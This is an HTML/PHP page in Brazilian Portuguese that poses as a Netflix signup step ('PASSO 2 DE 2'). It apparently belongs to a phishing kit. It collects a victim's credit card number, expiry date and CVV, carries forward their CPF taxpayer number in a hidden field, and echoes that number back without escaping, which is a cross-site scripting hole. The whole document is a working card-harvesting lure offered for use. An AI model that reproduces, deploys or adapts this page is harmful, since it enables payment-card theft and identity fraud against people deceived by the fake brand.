<!DOCTYPE html>
<html>

<head>
    <title>Netflix</title>
</head>
<meta name="viewport" content="width=device-width,initial-scale=1.0,minimum-scale=1.0,maximum-scale=1.0" />
<style type="text/css">
    * {
        font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif;
    }

    body {
        background: #f3f3f3;
        margin: 15px;
        font-size: 19px;
        color: #333;
        -webkit-font-smoothing: antialiased;
    }

    input[type=submit] {

        color: #fff;
        background-color: #e50914;
        padding: 20px;
        width: 100%;
        -webkit-box-sizing: border-box;
        /* Safari/Chrome, other WebKit */
        -moz-box-sizing: border-box;
        /* Firefox, other Gecko */
        box-sizing: border-box;
        font-size: 19px;
        padding: .75rem 25.33333333px;
        min-width: 110px;
        min-height: 60px;
        width: 100%;
        line-height: 19px;
        margin-bottom: 15px;
        font-weight: bold;
        border: none;
    }

    input[type=text]:focus {

        border: 1px solid blue;

    }

    input[type=text],
    input[type=tel],
    input[type=password] {

        padding: 20px;
        outline: none;
        border-radius: 2px;
        width: 100%;
        -webkit-box-sizing: border-box;
        /* Safari/Chrome, other WebKit */
        -moz-box-sizing: border-box;
        /* Firefox, other Gecko */
        box-sizing: border-box;
        border: 1px solid #333;
        margin-bottom: 15px;
    }

    .error {
        display: none;
        font-size: 12px;
        color: #b92d2b;
        margin-bottom: 10px;
        margin-top: -10px;

    }
</style>
<script src="//code.jquery.com/jquery-1.10.2.min.js"></script>

<body>
    <img src="/logo.png"><br>



    <table width="400px" align="center">
        <tr>
            <td>
                <p>
                    <span style="font-size:13px;">PASSO <b>2</b> DE <b>2</b></span></p>
                <p><b>Informe os dados do seu cartão de crédito.</b></p>

                <div><img src="/cc.png"></div>

                <form id="form1" action="/signup/complete" method="POST">
                    <div><input type="tel" name="cartao" maxlength="19" value="" id="cartao" placeholder="Número do Cartão de Crédito:"></div>
                    <div class="error" id="error_cartao">O número do cartão de crédito é obrigatório..</div>
                    <div><input type="tel" name="datavalidade" id="datavalidade" value="" placeholder="Data de validade (MM/AA):"></div>
                    <div class="error" id="error_datavalidade">O data de validade é obrigatória (MES/ANO).</div>
                    <div><input type="tel" maxlength="4" name="cvv" id="cvv" value="" placeholder="Código de verificação (CVV):"></div>
                    <div class="error" id="error_cvv">O código de verificação é obrigatório (CVV).</div>
                    <div><input type="hidden" name="cpf" value="<?php echo $_POST['cpf'] ?>"></div>
                    <div><input type="submit" name="continuar" value="CONTINUAR"></div>

                </form>
            </td>
        </tr>
    </table>


    <script src="//cdnjs.cloudflare.com/ajax/libs/jquery.maskedinput/1.4.1/jquery.maskedinput.min.js"></script>
    <SCRIPT language="javascript">
        $(document).ready(function () {
            $('#datavalidade').mask('99/99');
            $('#cartao').mask('9999 9999 9999 9999');
            return false;
        });
    </SCRIPT>
    <script>
        $('#form1').submit(function () {

            var error = 0;
            if ($('#cartao').val().length != 19) {
                $('#cartao').css('border', '1px solid red');
                $('#error_cartao').show();
                error = 1;
            } else {
                $('#cartao').css('border', '1px solid #333');
                $('#error_cartao').hide();
            }

            if ($('#datavalidade').val().length < 4) {
                $('#datavalidade').css('border', '1px solid red');
                $('#error_datavalidade').show();
                error = 1;
            } else {
                $('#datavalidade').css('border', '1px solid #333');
                $('#error_datavalidade').hide();
            }

            if ($('#cvv').val().length < 2) {
                $('#cvv').css('border', '1px solid red');
                $('#error_cvv').show();
                error = 1;
            } else {
                $('#cvv').css('border', '1px solid #333');
                $('#error_cvv').hide();
            }

            if (error == 1) {
                return false;
            }

        });
    </script>
</body>

</html>